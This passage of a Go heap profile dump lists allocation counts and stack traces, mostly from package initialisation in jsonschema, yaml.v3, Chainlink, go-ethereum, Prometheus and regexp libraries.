# 0xddb7f7 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0xf7 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:220
# 0xddacf9 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).Compile+0xd9 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:133
# 0xddab97 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).MustCompile+0x17 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:114
# 0xde207d github.com/santhosh-tekuri/jsonschema/v5.(*Draft).loadMeta+0x17d /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:46
# 0xde3808 github.com/santhosh-tekuri/jsonschema/v5.init.0+0x7c8 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:770
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 160] @ 0x48e865 0x4287c5 0xd2d80f 0xd2dda5 0xd2d545 0xd2e237 0xd2e296 0xd2d569 0xd2e32e 0xd2e394 0xd2d569 0xd2e32e 0xd2e394 0xd2d569 0xd2da58 0xd2dab7 0xd2d525 0xd5aeb3 0xe947f0 0xe947cf 0xe8a872 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xd2d80e gopkg.in/yaml%2ev3.(*parser).node+0x1ae /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:180
# 0xd2dda4 gopkg.in/yaml%2ev3.(*parser).scalar+0x104 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:247
# 0xd2d544 gopkg.in/yaml%2ev3.(*parser).parse+0xc4 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:151
# 0xd2e236 gopkg.in/yaml%2ev3.(*parser).parseChild+0x136 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:197
# 0xd2e295 gopkg.in/yaml%2ev3.(*parser).mapping+0x195 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:280
# 0xd2d568 gopkg.in/yaml%2ev3.(*parser).parse+0xe8 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:155
# 0xd2e32d gopkg.in/yaml%2ev3.(*parser).parseChild+0x22d /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:197
# 0xd2e393 gopkg.in/yaml%2ev3.(*parser).mapping+0x293 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:288
# 0xd2d568 gopkg.in/yaml%2ev3.(*parser).parse+0xe8 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:155
# 0xd2e32d gopkg.in/yaml%2ev3.(*parser).parseChild+0x22d /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:197
# 0xd2e393 gopkg.in/yaml%2ev3.(*parser).mapping+0x293 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:288
# 0xd2d568 gopkg.in/yaml%2ev3.(*parser).parse+0xe8 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:155
# 0xd2da57 gopkg.in/yaml%2ev3.(*parser).parseChild+0x77 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:197
# 0xd2dab6 gopkg.in/yaml%2ev3.(*parser).document+0xd6 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:206
# 0xd2d524 gopkg.in/yaml%2ev3.(*parser).parse+0xa4 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:159
# 0xd5aeb2 gopkg.in/yaml%2ev3.unmarshal+0x2d2 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yaml.go:161
# 0xe947ef gopkg.in/yaml%2ev3.Unmarshal+0x4f /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yaml.go:89
# 0xe947ce github.com/smartcontractkit/chain-selectors.parseYml+0x2e /go/pkg/mod/github.com/smartcontractkit/chain-selectors@v1.0.100/evm.go:72
# 0xe8a871 github.com/smartcontractkit/chain-selectors.init+0x2b1 /go/pkg/mod/github.com/smartcontractkit/chain-selectors@v1.0.100/evm.go:22
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 24] @ 0x48e88c 0x4760de 0x4760d2 0x475745 0x47589e 0xde07eb 0xddc4d3 0xddbadf 0xddb7f8 0xddacfa 0xddab98 0xde207e 0xde37e5 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xde07ea github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x426a /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:528
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbade github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x27e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:241
# 0xddb7f7 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0xf7 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:220
# 0xddacf9 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).Compile+0xd9 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:133
# 0xddab97 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).MustCompile+0x17 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:114
# 0xde207d github.com/santhosh-tekuri/jsonschema/v5.(*Draft).loadMeta+0x17d /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:46
# 0xde37e4 github.com/santhosh-tekuri/jsonschema/v5.init.0+0x7a4 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/draft.go:598
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 32] @ 0x48e88c 0x493c69 0xd4b10b 0xd56e52 0xd4f353 0xd4bf6b 0xd4b729 0xd400c5 0xd44ad8 0xd40912 0xd407f5 0xd2d2ea 0xd2e418 0xd2d569 0xd2e32e 0xd2e394 0xd2d569 0xd2da58 0xd2dab7 0xd2d525 0xd5aeb3 0xe947f0 0xe947cf 0xe8a872 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xd4b10a gopkg.in/yaml%2ev3.read+0xea /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/scannerc.go:551
# 0xd56e51 gopkg.in/yaml%2ev3.yaml_parser_scan_plain_scalar+0x8b1 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/scannerc.go:2759
# 0xd4f352 gopkg.in/yaml%2ev3.yaml_parser_fetch_plain_scalar+0x72 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/scannerc.go:1527
# 0xd4bf6a gopkg.in/yaml%2ev3.yaml_parser_fetch_next_token+0x7ea /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/scannerc.go:874
# 0xd4b728 gopkg.in/yaml%2ev3.yaml_parser_fetch_more_tokens+0x188 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/scannerc.go:677
# 0xd400c4 gopkg.in/yaml%2ev3.peek_token+0x24 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/parserc.go:69
# 0xd44ad7 gopkg.in/yaml%2ev3.yaml_parser_parse_block_mapping_key+0x337 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/parserc.go:847
# 0xd40911 gopkg.in/yaml%2ev3.yaml_parser_state_machine+0xf1 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/parserc.go:191
# 0xd407f4 gopkg.in/yaml%2ev3.yaml_parser_parse+0x94 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/parserc.go:129
# 0xd2d2e9 gopkg.in/yaml%2ev3.(*parser).peek+0x29 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:106
# 0xd2e417 gopkg.in/yaml%2ev3.(*parser).mapping+0x317 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:293
# 0xd2d568 gopkg.in/yaml%2ev3.(*parser).parse+0xe8 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:155
# 0xd2e32d gopkg.in/yaml%2ev3.(*parser).parseChild+0x22d /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:197
# 0xd2e393 gopkg.in/yaml%2ev3.(*parser).mapping+0x293 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:288
# 0xd2d568 gopkg.in/yaml%2ev3.(*parser).parse+0xe8 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:155
# 0xd2da57 gopkg.in/yaml%2ev3.(*parser).parseChild+0x77 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:197
# 0xd2dab6 gopkg.in/yaml%2ev3.(*parser).document+0xd6 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:206
# 0xd2d524 gopkg.in/yaml%2ev3.(*parser).parse+0xa4 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:159
# 0xd5aeb2 gopkg.in/yaml%2ev3.unmarshal+0x2d2 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yaml.go:161
# 0xe947ef gopkg.in/yaml%2ev3.Unmarshal+0x4f /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yaml.go:89
# 0xe947ce github.com/smartcontractkit/chain-selectors.parseYml+0x2e /go/pkg/mod/github.com/smartcontractkit/chain-selectors@v1.0.100/evm.go:72
# 0xe8a871 github.com/smartcontractkit/chain-selectors.init+0x2b1 /go/pkg/mod/github.com/smartcontractkit/chain-selectors@v1.0.100/evm.go:22
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 416] @ 0x48e88c 0x476694 0x4761a6 0x76170c 0x19a8f23 0x19a86db 0x19a814f 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x76170b embed.FS.ReadFile+0x4b /usr/local/go/src/embed/embed.go:331
# 0x19a8f22 github.com/smartcontractkit/chainlink-evm/pkg/config/toml.readConfig+0x62 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:141
# 0x19a86da github.com/smartcontractkit/chainlink-evm/pkg/config/toml.initDefaults+0x2da /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:99
# 0x19a814e github.com/smartcontractkit/chainlink-evm/pkg/config/toml.init.0+0x6e /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/config/toml/defaults.go:42
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 16] @ 0x48e865 0x48e1c5 0x1389fe7 0x1383b55 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x19a05a5 0x1c756cb 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x1389fe6 github.com/ethereum/go-ethereum/accounts/abi.NewEvent+0x8e6 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/event.go:87
# 0x1383b54 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x3f4 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:192
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x19a05a4 github.com/smartcontractkit/chainlink-evm/pkg/types.MustGetABI+0xe4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/types/utils.go:10
# 0x1c756ca github.com/smartcontractkit/chainlink-evm/pkg/automation/v21/core.init+0xaa /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/automation/v21/core/abi.go:12
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 32] @ 0x48e865 0x494207 0x4a3c1d 0x4a3ae6 0x4a385c 0x6ccd7e 0x6ccd97 0x6cf057 0xdfad2c 0xdfad04 0xdfacfd 0xdfb085 0xdfb043 0x1b6718d 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x4a3c1c sync.(*Pool).pinSlow+0xfc /usr/local/go/src/sync/pool.go:237
# 0x4a3ae5 sync.(*Pool).pin+0x45 /usr/local/go/src/sync/pool.go:220
# 0x4a385b sync.(*Pool).Get+0x1b /usr/local/go/src/sync/pool.go:135
# 0x6ccd7d regexp.newBitState+0x9d /usr/local/go/src/regexp/backtrack.go:50
# 0x6ccd96 regexp.(*Regexp).backtrack+0xb6 /usr/local/go/src/regexp/backtrack.go:315
# 0x6cf056 regexp.(*Regexp).doExecute+0x276 /usr/local/go/src/regexp/exec.go:535
# 0xdfad2b regexp.(*Regexp).doMatch+0x1ab /usr/local/go/src/regexp/exec.go:514
# 0xdfad03 regexp.(*Regexp).MatchString+0x183 /usr/local/go/src/regexp/regexp.go:507
# 0xdfacfc github.com/smartcontractkit/chainlink-common/pkg/capabilities.newCapabilityInfo+0x17c /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/capabilities/capabilities.go:556
# 0xdfb084 github.com/smartcontractkit/chainlink-common/pkg/capabilities.NewCapabilityInfo+0xa4 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/capabilities/capabilities.go:585
# 0xdfb042 github.com/smartcontractkit/chainlink-common/pkg/capabilities.MustNewCapabilityInfo+0x62 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/capabilities/capabilities.go:610
# 0x1b6718c github.com/smartcontractkit/chainlink-common/pkg/capabilities/triggers.init+0x4c /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/capabilities/triggers/on_demand_trigger.go:12
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [0: 0] @ 0x48e88c 0x4287c5 0x782ac5 0x781fcf 0x781fc5 0x781beb 0x4a36ac 0x4a35d9 0x781b79 0x78223d 0x786849 0x786826 0x546392 0xa09225 0xa08ca8 0xa0397b 0xa0a2fe 0x10afaf1 0x889e69 0x88bc67 0x8aa68e 0x887f50 0x4994c1
# 0x782ac4 hash/crc32.slicingMakeTable+0x24 /usr/local/go/src/hash/crc32/crc32_generic.go:61
# 0x781fce hash/crc32.archInitIEEE+0x2e /usr/local/go/src/hash/crc32/crc32_amd64.go:212
# 0x781fc4 hash/crc32.init.func2+0x24 /usr/local/go/src/hash/crc32/crc32.go:109
# 0x781bea hash/crc32.init.OnceFunc.func4.1+0x4a /usr/local/go/src/sync/oncefunc.go:33
# 0x4a36ab sync.(*Once).doSlow+0xab /usr/local/go/src/sync/once.go:78
# 0x4a35d8 sync.(*Once).Do+0x18 /usr/local/go/src/sync/once.go:69
# 0x781b78 hash/crc32.init.OnceFunc.func4+0x38 /usr/local/go/src/sync/oncefunc.go:22
# 0x78223c hash/crc32.update+0x7c /usr/local/go/src/hash/crc32/crc32.go:208
# 0x786848 hash/crc32.Update+0x328 /usr/local/go/src/hash/crc32/crc32.go:220
# 0x786825 compress/gzip.(*Writer).Write+0x305 /usr/local/go/src/compress/gzip/gzip.go:195
# 0x546391 bufio.(*Writer).Flush+0x51 /usr/local/go/src/bufio/bufio.go:642
# 0xa09224 github.com/prometheus/common/expfmt.MetricFamilyToText.func1+0x24 /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/text_create.go:96
# 0xa08ca7 github.com/prometheus/common/expfmt.MetricFamilyToText+0x11e7 /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/text_create.go:293
# 0xa0397a github.com/prometheus/common/expfmt.NewEncoder.func7+0x3a /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/encode.go:178
# 0xa0a2fd github.com/prometheus/common/expfmt.encoderCloser.Encode+0x1d /go/pkg/mod/github.com/prometheus/common@v0.67.5/expfmt/encode.go:51
# 0x10afaf0 github.com/prometheus/client_golang/prometheus/promhttp.HandlerForTransactional.func1+0xad0 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/promhttp/http.go:249
# 0x889e68 net/http.HandlerFunc.ServeHTTP+0x28 /usr/local/go/src/net/http/server.go:2286
# 0x88bc66 net/http.(*ServeMux).ServeHTTP+0x1c6 /usr/local/go/src/net/http/server.go:2828
# 0x8aa68d net/http.serverHandler.ServeHTTP+0x8d /usr/local/go/src/net/http/server.go:3311
# 0x887f4f net/http.(*conn).serve+0x64f /usr/local/go/src/net/http/server.go:2073
0: 0 [1: 32768] @ 0x48e893 0x493c69 0x6cbfbe 0x6cce7f 0x6cf057 0x6d3ec5 0x6d3872 0x179059e 0x1790570 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6cbfbd regexp.(*bitState).reset+0xfd /usr/local/go/src/regexp/backtrack.go:91
# 0x6cce7e regexp.(*Regexp).backtrack+0x19e /usr/local/go/src/regexp/backtrack.go:317
# 0x6cf056 regexp.(*Regexp).doExecute+0x276 /usr/local/go/src/regexp/exec.go:535
# 0x6d3ec4 regexp.(*Regexp).replaceAll+0x184 /usr/local/go/src/regexp/regexp.go:599
# 0x6d3871 regexp.(*Regexp).ReplaceAllString+0xd1 /usr/local/go/src/regexp/regexp.go:557
# 0x179059d github.com/cockroachdb/redact/internal/markers.RedactableString.StripMarkers+0x3d /go/pkg/mod/github.com/cockroachdb/redact@v1.1.6/internal/markers/markers.go:33
# 0x179056f github.com/cockroachdb/errors/report.init+0xf /go/pkg/mod/github.com/cockroachdb/errors@v1.12.0/report/report.go:354
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 1536] @ 0x48e86c 0x493c69 0x6d0514 0x6d1d8a 0x6d216f 0x6d2c6c 0x6d2c60 0x1788f65 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6d0513 regexp.makeOnePass+0x233 /usr/local/go/src/regexp/onepass.go:303
# 0x6d1d89 regexp.compileOnePass+0x1a9 /usr/local/go/src/regexp/onepass.go:502
# 0x6d216e regexp.compile+0x8e /usr/local/go/src/regexp/regexp.go:187
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x1788f64 github.com/getsentry/sentry-go.init+0x4a4 /go/pkg/mod/github.com/getsentry/sentry-go@v0.35.1/tracing.go:386
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 16] @ 0x48e865 0x494207 0x6cbb27 0x6cb327 0x6d214d 0x6d2c6c 0x6d2c60 0x9f9e8d 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6cbb26 regexp/syntax.(*Regexp).Simplify+0xc26 /usr/local/go/src/regexp/syntax/simplify.go:69
# 0x6cb326 regexp/syntax.(*Regexp).Simplify+0x426 /usr/local/go/src/regexp/syntax/simplify.go:23
# 0x6d214c regexp.compile+0x6c /usr/local/go/src/regexp/regexp.go:175
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x9f9e8c github.com/prometheus/procfs.init+0x30c /go/pkg/mod/github.com/prometheus/procfs@v0.20.1/proc_limits.go:78
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 112] @ 0x48e865 0x4287c5 0x6c1454 0x6c13b1 0x6c1df8 0x6c1745 0x6c1155 0x6c54d9 0x6c36bb 0x6d2110 0x6d210b 0x6d2c6c 0x6d2c60 0x14f9beb 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6c1453 regexp/syntax.(*parser).newRegexp+0xf3 /usr/local/go/src/regexp/syntax/parse.go:147
# 0x6c13b0 regexp/syntax.(*parser).collapse+0x50 /usr/local/go/src/regexp/syntax/parse.go:553
# 0x6c1df7 regexp/syntax.(*parser).factor+0x5b7 /usr/local/go/src/regexp/syntax/parse.go:644
# 0x6c1744 regexp/syntax.(*parser).collapse+0x3e4 /usr/local/go/src/regexp/syntax/parse.go:564
# 0x6c1154 regexp/syntax.(*parser).alternate+0x154 /usr/local/go/src/regexp/syntax/parse.go:519
# 0x6c54d8 regexp/syntax.(*parser).parseRightParen+0x58 /usr/local/go/src/regexp/syntax/parse.go:1417
# 0x6c36ba regexp/syntax.parse+0x49a /usr/local/go/src/regexp/syntax/parse.go:948
# 0x6d210f regexp/syntax.Parse+0x2f /usr/local/go/src/regexp/syntax/parse.go:888
# 0x6d210a regexp.compile+0x2a /usr/local/go/src/regexp/regexp.go:168
# 0x6d2c6b regexp.Compile+0x2b /usr/local/go/src/regexp/regexp.go:131
# 0x6d2c5f regexp.MustCompile+0x1f /usr/local/go/src/regexp/regexp.go:311
# 0x14f9bea github.com/smartcontractkit/chainlink-data-streams/llo/reportcodecs/evm.init+0x34a /go/pkg/mod/github.com/smartcontractkit/chainlink-data-streams@v0.1.15-0.20260522094612-5f9f748bd87a/llo/reportcodecs/evm/report_codec_common.go:249
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 64 [1: 64] @ 0x48e865 0x4287c5 0x159e1e9 0x159b35c 0x159b23c 0x159b15c 0x159af5c 0x159ad7c 0x15a8ac8 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x159e1e8 github.com/ethereum/go-ethereum/core/vm.newFrontierInstructionSet+0x2da8 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:1097
# 0x159b35b github.com/ethereum/go-ethereum/core/vm.newHomesteadInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:271
# 0x159b23b github.com/ethereum/go-ethereum/core/vm.newTangerineWhistleInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:257
# 0x159b15b github.com/ethereum/go-ethereum/core/vm.newSpuriousDragonInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:250
# 0x159af5b github.com/ethereum/go-ethereum/core/vm.newByzantiumInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:215
# 0x159ad7b github.com/ethereum/go-ethereum/core/vm.newConstantinopleInstructionSet+0x3b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:176
# 0x15a8ac7 github.com/ethereum/go-ethereum/core/vm.init+0x3967 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/core/vm/jump_table.go:56
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
1: 480 [1: 480] @ 0x48e865 0x4287c5 0x463505 0x45af7f 0x45af75 0x45d565 0x45e075 0x45e730 0x45ebb6 0x45ec32 0x4611da 0x4618e5 0x473f3a 0x473f30 0x4979fd
# 0x48e864 runtime.mallocgc+0xa4 /usr/local/go/src/runtime/malloc.go:1150
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x463504 runtime.malg+0x24 /usr/local/go/src/runtime/proc.go:5274
# 0x45af7e runtime.mpreinit+0xde /usr/local/go/src/runtime/os_linux.go:388
# 0x45af74 runtime.mcommoninit+0xd4 /usr/local/go/src/runtime/proc.go:1018
# 0x45d564 runtime.allocm+0xc4 /usr/local/go/src/runtime/proc.go:2326
# 0x45e074 runtime.newm+0x34 /usr/local/go/src/runtime/proc.go:2870
# 0x45e72f runtime.startm+0x12f /usr/local/go/src/runtime/proc.go:3096
# 0x45ebb5 runtime.handoffp+0x2f5 /usr/local/go/src/runtime/proc.go:3137
# 0x45ec31 runtime.stoplockedm+0x51 /usr/local/go/src/runtime/proc.go:3259
# 0x4611d9 runtime.schedule+0x39 /usr/local/go/src/runtime/proc.go:4143
# 0x4618e4 runtime.goschedImpl+0x1e4 /usr/local/go/src/runtime/proc.go:4345
# 0x473f39 runtime.gopreempt_m+0x419 /usr/local/go/src/runtime/proc.go:4362
# 0x473f2f runtime.newstack+0x40f /usr/local/go/src/runtime/stack.go:1145
# 0x4979fc runtime.morestack+0x7c /usr/local/go/src/runtime/asm_amd64.s:681
1: 480 [1: 480] @ 0x48e865 0x4287c5 0x463505 0x463779 0x4636a5 0x4978ea
# 0x48e864 runtime.mallocgc+0xa4 /usr/local/go/src/runtime/malloc.go:1150
# 0x4287c4 runtime.newobject+0x24 /usr/local/go/src/runtime/malloc.go:2157
# 0x463504 runtime.malg+0x24 /usr/local/go/src/runtime/proc.go:5274
# 0x463778 runtime.newproc1+0x78 /usr/local/go/src/runtime/proc.go:5322
# 0x4636a4 runtime.newproc.func1+0x24 /usr/local/go/src/runtime/proc.go:5299
# 0x4978e9 runtime.systemstack+0x49 /usr/local/go/src/runtime/asm_amd64.s:562
1: 896 [1: 896] @ 0x48e86c 0x4287c5 0xde7905 0xddbb7c 0xde0874 0xde07ce 0xddc4d3 0xddbadf 0xddb7f8 0xddacfa 0xddab98 0xde207e 0xde37bd 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xde7904 github.com/santhosh-tekuri/jsonschema/v5.newSchema+0x44 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/schema.go:113
# 0xddbb7b github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x31b /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:261
# 0xde0873 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap.func3+0x42f3 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:484
# 0xde07cd github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileMap+0x424d /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:528
# 0xddc4d2 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compile+0x132 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:296
# 0xddbade github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileRef+0x27e /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:241
# 0xddb7f7 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).compileURL+0xf7 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:220
